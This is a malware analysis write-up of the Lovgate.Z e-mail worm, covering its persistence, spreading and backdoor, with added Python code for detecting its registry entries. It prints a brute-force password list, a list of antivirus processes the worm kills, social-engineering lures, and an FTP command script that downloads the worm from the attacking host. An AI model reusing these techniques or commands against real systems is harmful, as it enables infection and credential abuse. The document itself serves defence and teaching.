Lovgate.Z is a typical mass-mailing e-mail worm. The file is 128000 bytes in size and is compressed with the executable runtime packers ASPack and JDPack.
Note: In the following text the symbolic inscription %windir% is used instead of the name of the directory in which the Windows operating system is installed. Of course, this may differ from installation to installation. The inscription %system% represents in the following text the subdirectory System or System32 in the directory %windir%.
Installation and Autostart Techniques
Upon execution the worm copies itself into the Windows folder as “Systra.exe” and creates self-copies in the %system% folder: RAVMOND.exe and iexplore.exe. The worm also drops more components into the %system% folder: Hxdef.exe, WinHelp.exe and kernel66.dll.
Note: The worm sets the hidden, read only and system attributes to Kernel66.DLL
Lovgate.Z creates numerous copies of its backdoor component (53,760 bytes) in the system folder:
ODBC16.DLL
MSJDBC11.DLL
MSSIGN30.DLL
LMMIB20.DLL
The worm adds the following registry entries to make sure that it runs every time Windows is started:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“Hardware Profile” = “%System%\hxdef.exe”
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
“Microsoft NetMeeting Associates, Inc.” = “NetMeeting.exe”
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“Program in Windows” = “%System%\IEXPLORE.EXE”
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“Protected Storage” = “RUNDLL32.EXE MSSIGN30.DLL ondll_reg”
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“VFW Encoder/Decoder Settings” = “RUNDLL32.exe MSSIGN30.DLL ondll_reg”
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“WinHelp” = “%System%\WinHelp.exe”
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
“SystemTra” = “%Windir%\Systra.exe”
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
“run” = “RAVMOND.exe”
Note: The registry autostart entry “run” = “RAVMOND.exe” will only work on Windows NT-based systems. The worm may also create the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\“ZMXLIB1”.
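A defender's check for the autostart entries listed above (and the “Shell Extension” value noted under Other Details), added here as an example; it is not ESET's tooling or the worm's code. It takes (key, value name, data) triples as they would be exported from the Run, RunServices and Windows NT “run” locations and flags known pairs as well as any value that references a dropped component; the sample entries are constructed.

```python
# Known Lovgate.Z autostart values from the write-up (value name -> data),
# lower-cased; %system% and %windir% stand for the real folders.
LOVGATE_RUN_VALUES = {
    "hardware profile": r"%system%\hxdef.exe",
    "microsoft netmeeting associates, inc.": "netmeeting.exe",
    "program in windows": r"%system%\iexplore.exe",
    "protected storage": "rundll32.exe mssign30.dll ondll_reg",
    "vfw encoder/decoder settings": "rundll32.exe mssign30.dll ondll_reg",
    "winhelp": r"%system%\winhelp.exe",
    "systemtra": r"%windir%\systra.exe",
    "run": "ravmond.exe",
    "shell extension": r"%system%\spollsv.exe",
}
# Dropped components worth flagging wherever they appear in autostart data.
LOVGATE_FILES = ("hxdef.exe", "systra.exe", "ravmond.exe", "netmeeting.exe",
                 "spollsv.exe", "mssign30.dll", "msjdbc11.dll")

def normalise(data, windir=r"C:\Windows"):
    """Lower-case the value data, drop surrounding quotes and fold the real
    Windows / System32 paths back to the %windir% / %system% placeholders."""
    d = data.lower().strip('"')
    for sysdir in (windir + r"\system32", windir + r"\system"):
        d = d.replace(sysdir.lower(), "%system%")
    return d.replace(windir.lower(), "%windir%")

def find_lovgate_autostarts(entries, windir=r"C:\Windows"):
    """entries: iterable of (key, value_name, data). Returns (key, name, reason)
    for each entry matching a known pair or referencing a dropped component."""
    hits = []
    for key, name, data in entries:
        n, d = name.lower(), normalise(data, windir)
        if LOVGATE_RUN_VALUES.get(n) == d:
            hits.append((key, name, "known Lovgate.Z autostart value"))
        elif any(f in d for f in LOVGATE_FILES):
            hits.append((key, name, "references a Lovgate.Z component"))
    return hits

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_ENTRIES = [  # constructed registry export, mixing benign and worm values
    (RUN_KEY, "Hardware Profile", r"C:\Windows\System32\hxdef.exe"),
    (RUN_KEY, "Protected Storage", "RUNDLL32.EXE MSSIGN30.DLL ondll_reg"),
    (RUN_KEY, "SecurityHealth", r"C:\Program Files\Vendor\health.exe"),
    (r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows", "run", "RAVMOND.exe"),
    (RUN_KEY, "Updater", r"C:\Windows\Systra.exe"),  # renamed value, same dropped file
]

if __name__ == "__main__":
    for key, name, reason in find_lovgate_autostarts(SAMPLE_ENTRIES):
        print(f"{key}\\{name}: {reason}")
```

The component-name check catches the case where the value name was changed but the data still points at one of the dropped files.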
System Services
It creates two system services, named "_reg" and “Windows Management Protocol v.0 (experimental)”; both are set to execute "Rundll32.exe msjdbc11.dll ondll_server".
The worm stops the following services:
Symantec Antivirus Server,
Symantec Client and
Rising Realtime Monitor Service
Process Termination
The worm terminates all running processes whose names contain one of the following strings:
KV
KAV
Duba
NAV
kill
RavMon.exe
Rfw.exe
Gate
McAfee
Symantec
SkyNet
rising
Code Injection
Injects a remote thread into Taskmgr.exe or Explorer.exe. If this thread detects that the worm is not running or has been deleted, it will attempt to copy and execute itself in order to reinstall the worm.
Local Distribution (Drives)
Creates the file Autorun.inf directly in the root folder of all drives except CD-ROM drives, and copies itself as Command.com into that folder.
Note: As a result, if a user opens a drive by double-clicking its icon, the worm is executed.
The worm looks for executable files on the system and renames their file extensions to “*.ZMX”.
It then copies itself using the original EXE filename.
Creates archive files { filename } . { ext } in the root folder of all fixed hard disk drives.
{ filename } is one of the following:
WORK
setup
Important
bak
letter
pass
{ ext } is one of the following:
RAR
ZIP
This archive file contains a copy of the worm with the file name { filename } . { ext }.
{ filename } is one of the following:
WORK
setup
Important
book
email
PassWord
{ ext } is one of the following:
exe
com
pif
scr
Network Distribution (Shares)
Creates copies of itself in all shared network folders, including subfolders below the shared root folders, using a file name randomly chosen from the following list:
“WinRAR.exe”
“Internet Explorer.bat”
“Documents and Settings.txt.exe”
“Microsoft Office.exe”
“Windows Media Player.zip.exe”
“Support Tools.exe”
“WindowsUpdate.pif”
“Cain.pif”
“MSDN.ZIP.pif”
“autoexec.bat”
“findpass.exe”
“client.exe”
“i386.exe”
“winhlp32.exe”
“xcopy.exe”
“mmc.exe”
Note: Creates a network share, "Media", which points to "%Windir%\Media".
Network Distribution (Clients)
Scans for weak passwords on all reachable network clients and tries to log in as Administrator with the following passwords:
(blank password)
Guest Administrator zxcv yxcv xxx win test123 test temp123 temp sybase super
sex secret pwd pw123 Password owner oracle mypc123 mypc mypass123 mypass
love login Login Internet home godblessyou god enable database computer alpha
admin123 Admin abcd aaa 88888888 2600 2004 2003 123asd 123abc 123456789
1234567 123123 121212 11111111 110 007 00000000 000000 pass 54321 12345
password passwd server sql !@#$%^&* !@#$%^& !@#$%^ !@#$% asdfgh
asdf !@#$ 1234 111 root abc123 12345678 abcdefg abcdef abc 888888 666666
111111 admin administrator guest 654321 123456 321 123
If the worm is able to gain access via the Administrator login, it drops a copy of itself as “NetManager.exe” into the ADMIN$ share under the system32 folder.
After that it starts this file as a system service named “Windows Management NetWork Service Extensions”.
FTP Server functionality
Starts an FTP server on a random port without any authentication, which makes the compromised system accessible to anyone via FTP commands.
Backdoor Component
It executes a backdoor routine on port 6000. The routine steals information from the compromised system and caches the stolen data in the file C:\Netlog.txt before the worm e-mails it to the attacker.
E-mail harvesting
The worm scans all fixed disks and collects e-mail addresses out of files which match one of the following file extensions:
*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl, *.txt
However, these extensions are largely ineffective as a filter, because the worm has a bug in the string concatenation and comparison it performs on the WIN32_FIND_DATA results.
In practice, the worm opens and scans a file for e-mail addresses whenever the file's extension occurs, with its characters in the same order, inside one of the extensions in the list. In technical terms, the worm compares the file extension with an instring/substring function instead of an exact comparison.
Example: for the list entry *.htm the worm will also search for e-mail addresses in files with the extensions *.ht and *.h.
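A small model of that comparison defect, added here to illustrate the write-up (it is not the worm's code): the buggy substring test is placed beside the exact comparison the list implies, and the sample file names are constructed. It also covers the edge case the substring test implies, a file with no extension at all.

```python
# Model of the extension-matching defect described above (constructed to
# illustrate the write-up; not the worm's code): a substring test in place
# of an exact comparison of the file extension.
HARVEST_EXTENSIONS = ("wab", "adb", "tbb", "dbx", "asp",
                      "php", "sht", "htm", "pl", "txt")

def extension_of(filename):
    """Return the text after the last dot of the file name, lower-cased,
    or '' when the name has no extension (the edge case that matters)."""
    base = filename.rsplit("\\", 1)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""

def buggy_is_target(filename):
    """Substring compare: the extension only has to occur, in order, inside
    one of the listed extensions. '' occurs in every string, so files
    without an extension are scanned as well."""
    ext = extension_of(filename)
    return any(ext in wanted for wanted in HARVEST_EXTENSIONS)

def correct_is_target(filename):
    """Exact compare of the whole extension, which is what the list implies."""
    return extension_of(filename) in HARVEST_EXTENSIONS

def classify(filenames):
    """Map each name to (buggy_result, correct_result) for side-by-side review."""
    return {f: (buggy_is_target(f), correct_is_target(f)) for f in filenames}

SAMPLE_FILES = [  # constructed names
    r"C:\inetpub\index.htm",  # listed: both tests hit
    r"C:\src\main.h",         # 'h' sits inside 'htm', 'php', 'sht': buggy hit only
    r"C:\src\main.c",         # 'c' is in no listed extension: neither hits
    r"C:\data\README",        # no extension: '' is inside everything, buggy hit only
    r"C:\tools\setup.exe",    # 'exe' is in no listed extension: neither hits
]

if __name__ == "__main__":
    for name, (buggy, correct) in classify(SAMPLE_FILES).items():
        print(f"{name:24} buggy={buggy!s:5} correct={correct!s:5}")
```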
E-mail Sender
The worm generates the sender's e-mail address from the following list of names:
adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom
to which it appends a randomly chosen domain name (the domain names are stored encrypted inside the worm).
It uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.
E-mail subjects
Lovgate.Z randomly selects an e-mail subject from the following list:
Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
test
hi
Message Body
The e-mail contains one of the following message texts:
It's the long-awaited film version of the Broadway hit. The message sent as a binary attachment.
The message contains Unicode characters and has been sent as a binary attachment.
Mail failed. For further assistance, please contact!
Note: The worm may also send e-mails containing a blank message body or random strings.
E-mail Attachments
The worm attaches itself under a randomly constructed file name with a file extension selected from:
.exe
.scr
.pif
.cmd
.bat
.zip
.rar
Lovgate.Z – an “Answering Machine”
While the worm is running, it replies to all incoming messages as they arrive in the mailbox of MAPI-compliant e-mail clients, such as Microsoft Outlook.
The worm puts “Re:” in front of the subject and quotes the original message body, followed by “{sender's domain} account auto-reply:” and one of the following strings:
If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.
Finally it adds “> Get your FREE <sender's domain>now! <” to complete the message body.
The worm attaches itself with a randomly selected file name from the following list:
the hardcore game-.pif
Sex in Office.rm.scr
Deutsch BloodPatch!.exe
s3msong.MP3.pif
Me_nude.AVI.pif
How to Crack all gamez.exe
Macromedia Flash.scr
SETUP.EXE
Shakira.zip.exe
dreamweaver MX (crack).exe
StarWars2 - CloneAttack.rm.scr
Industry Giant II.exe
DSL Modem Uncapper.rar.exe
joke.pif
Britney spears nude.exe.txt.exe
I am For u.doc.exe
Exploiting technologies
The worm also takes advantage of the DCOM RPC vulnerability (using TCP port 135) [see MS03-026] for spreading.
If the exploit succeeds, it executes code (shellcode) on the target machine which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is transferred to the target machine over the FTP server connection described above, using an FTP command file named “a”.)
The “a” file contains the following ftp commands:
open %IP% %TCP port%
ftp
ftp
bin
get hxdef.exe
bye
The worm runs FTP.EXE locally on the compromised system to retrieve a copy of the worm named "hxdef.exe" from the connecting system, and starts this file once it has been downloaded.
References:
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Other Details
Creates and executes the file “NetMeeting.exe” (61440 bytes) in the system folder.
When the user starts NetMeeting, it does the following:
- Copies itself as “spollsv.exe” into the system folder.
- Adds the value "Shell Extension" = "%system%\spollsv.exe" to the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.